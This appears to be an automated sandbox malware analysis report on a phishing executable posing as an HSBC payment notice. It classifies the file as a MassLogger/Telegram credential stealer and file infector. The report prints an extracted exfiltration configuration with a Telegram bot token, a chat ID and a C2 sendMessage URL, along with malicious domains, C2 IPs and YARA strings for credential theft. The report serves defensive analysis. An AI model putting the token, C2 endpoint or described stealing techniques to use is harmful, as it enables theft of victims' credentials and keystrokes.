Edit tour

Windows Analysis Report
HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Overview

General Information

Sample name:	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Analysis ID:	1574778
MD5:	81b5afa3c4b482b020699087cbadf902
SHA1:	65952a38e840d96662972cc99c71e8b901ade1b5
SHA256:	3a4bf749beed4f07deb352b6e0faf28c5c2f28d62374a8bbb3eeeb67b1096851
Tags:	exeuser-lowmal3
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected MassLogger RAT

Yara detected Telegram RAT

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to log keystrokes (.Net Source)

Creates files inside the volume driver (system volume information)

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Binary contains a suspicious time stamp

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Queries time zone information

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 81B5AFA3C4B482B020699087CBADF902)

RegSvcs.exe (PID: 7744 cmdline: "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

armsvc.exe (PID: 7384 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: D3F3792BEF47A45D62FE2257E6F0CC3A)

alg.exe (PID: 7428 cmdline: C:\Windows\System32\alg.exe MD5: 37501D1309CA59B3AC5B8B5DFADCDFD8)

AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)

AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)

AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)

AppVClient.exe (PID: 7524 cmdline: C:\Windows\system32\AppVClient.exe MD5: 34E56361BAE3B41565C3D0351C9D6C12)

FXSSVC.exe (PID: 7600 cmdline: C:\Windows\system32\fxssvc.exe MD5: A325842411FFCF5AAC92F081FF80E1D4)

elevation_service.exe (PID: 7676 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: F84F1E7B5D6E2F37D74AEEBB5944088A)

maintenanceservice.exe (PID: 7752 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 63C13938F9E801F48994A09AA63E6195)

PerceptionSimulationService.exe (PID: 7832 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: DCA53E9AFA3D477DCEA94893FAEAD38A)

perfhost.exe (PID: 7900 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: EE05579B3BCD384EA2133ED9493C415C)

Locator.exe (PID: 7944 cmdline: C:\Windows\system32\locator.exe MD5: 167963C80DCE9EE0C951E410D8E5A3B4)

SensorDataService.exe (PID: 7968 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 57FD8C7B7D17330D14DD1A4143FE9F84)

snmptrap.exe (PID: 8020 cmdline: C:\Windows\System32\snmptrap.exe MD5: 7DBF214BD93545C4D17CEB2B153C47D3)

Spectrum.exe (PID: 8068 cmdline: C:\Windows\system32\spectrum.exe MD5: 0D216484D64532FCD0E321859356E63D)

ssh-agent.exe (PID: 8172 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: 4DC1351C4F632E1FA9AC4443DEC931B7)

TieringEngineService.exe (PID: 6444 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: A32E6301A086F4E2862EB5068342DBA7)

AgentService.exe (PID: 6328 cmdline: C:\Windows\system32\AgentService.exe MD5: 51984CA1C81E28E32EC26F59E95B9523)

vds.exe (PID: 6696 cmdline: C:\Windows\System32\vds.exe MD5: B57D375F949CD736B41299F19E73A57A)

wbengine.exe (PID: 7140 cmdline: "C:\Windows\system32\wbengine.exe" MD5: 2FF68734C11FD98E322F8F7E5C9471FF)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xef73:$a1: get_encryptedPassword 0xf29b:$a2: get_encryptedUsername 0xed0e:$a3: get_timePasswordChanged 0xee2f:$a4: get_passwordField 0xef89:$a5: set_encryptedPassword 0x108e5:$a7: get_logins 0x10596:$a8: GetOutlookPasswords 0x10388:$a9: StartKeylogger 0x10835:$a10: KeyLoggerEventArgs 0x103e5:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe PID: 7288	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x11e773a:$a1: get_encryptedPassword 0x11e7a53:$a2: get_encryptedUsername 0x11e74e9:$a3: get_timePasswordChanged 0x11e760a:$a4: get_passwordField 0x11e7750:$a5: set_encryptedPassword 0x11e9053:$a7: get_logins 0x11e8d04:$a8: GetOutlookPasswords 0x11e8af6:$a9: StartKeylogger 0x11e8fa3:$a10: KeyLoggerEventArgs 0x11e8b53:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7744	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7744	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7744	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7744	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3be90:$a1: get_encryptedPassword 0x3c1a9:$a2: get_encryptedUsername 0x3bc3f:$a3: get_timePasswordChanged 0x3bd60:$a4: get_passwordField 0x3bea6:$a5: set_encryptedPassword 0x3d7a9:$a7: get_logins 0x3d45a:$a8: GetOutlookPasswords 0x3d24c:$a9: StartKeylogger 0x3d6f9:$a10: KeyLoggerEventArgs 0x3d2a9:$a11: KeyLoggerEventArgsEventHandler
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd373:$a1: get_encryptedPassword 0xd69b:$a2: get_encryptedUsername 0xd10e:$a3: get_timePasswordChanged 0xd22f:$a4: get_passwordField 0xd389:$a5: set_encryptedPassword 0xece5:$a7: get_logins 0xe996:$a8: GetOutlookPasswords 0xe788:$a9: StartKeylogger 0xec35:$a10: KeyLoggerEventArgs 0xe7e5:$a11: KeyLoggerEventArgsEventHandler
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12325:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11823:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b31:$a4: \Orbitum\User Data\Default\Login Data 0x12929:$a5: \Kometa\User Data\Default\Login Data
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
1.2.HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe.4190000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.140000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
12.2.RegSvcs.exe.140000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.RegSvcs.exe.140000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.RegSvcs.exe.140000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf173:$a1: get_encryptedPassword 0xf49b:$a2: get_encryptedUsername 0xef0e:$a3: get_timePasswordChanged 0xf02f:$a4: get_passwordField 0xf189:$a5: set_encryptedPassword 0x10ae5:$a7: get_logins 0x10796:$a8: GetOutlookPasswords 0x10588:$a9: StartKeylogger 0x10a35:$a10: KeyLoggerEventArgs 0x105e5:$a11: KeyLoggerEventArgsEventHandler
12.2.RegSvcs.exe.140000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14125:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13623:$a3: \Google\Chrome\User Data\Default\Login Data 0x13931:$a4: \Orbitum\User Data\Default\Login Data 0x14729:$a5: \Kometa\User Data\Default\Login Data
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T15:47:33.956723+0100	2051649	1	A Network Trojan was detected	192.168.2.7	63846	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T15:47:25.763240+0100	2051648	1	A Network Trojan was detected	192.168.2.7	49242	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T15:47:19.510170+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.7	49705	TCP
2024-12-13T15:47:25.855498+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.7	49720	TCP
2024-12-13T15:47:36.926344+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.7	49754	TCP
2024-12-13T15:49:10.635804+0100	2018141	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.7	49961	TCP
2024-12-13T15:49:17.325223+0100	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.7	49977	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T15:47:19.510170+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.7	49705	TCP
2024-12-13T15:47:25.855498+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.7	49720	TCP
2024-12-13T15:47:36.926344+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.7	49754	TCP
2024-12-13T15:49:10.635804+0100	2037771	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.7	49961	TCP
2024-12-13T15:49:17.325223+0100	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.7	49977	TCP

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T15:47:34.261115+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.7	49747	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T15:47:24.386280+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49714	132.226.8.169	80	TCP
2024-12-13T15:47:32.026960+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49714	132.226.8.169	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T15:47:27.714419+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.7	49726	172.234.222.138	80	TCP
2024-12-13T15:48:45.741779+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.7	49866	82.112.184.197	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005	Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/	Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/?ts=fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwNjZ8fHx8fHw2NzVjNDkwMmIx	Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/aikqer	Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005~X	Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/gtsohqagtapqeyt?usid=23&utid=8062768005$G	Avira URL Cloud: Label: malware
Source: http://ww7.przvgke.biz/aikqer?usid=23&utid=8062768193	Avira URL Cloud: Label: malware
Source: http://ww7.przvgke.biz/	Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/TY	Avira URL Cloud: Label: malware
Source: http://ww99.przvgke.biz/gtsohqagtapqeyt	Avira URL Cloud: Label: malware
Source: http://ww12.przvgke.biz/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY", "Telegram Chatid": "1613755033"}
Source: RegSvcs.exe.7744.12.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendMessage"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
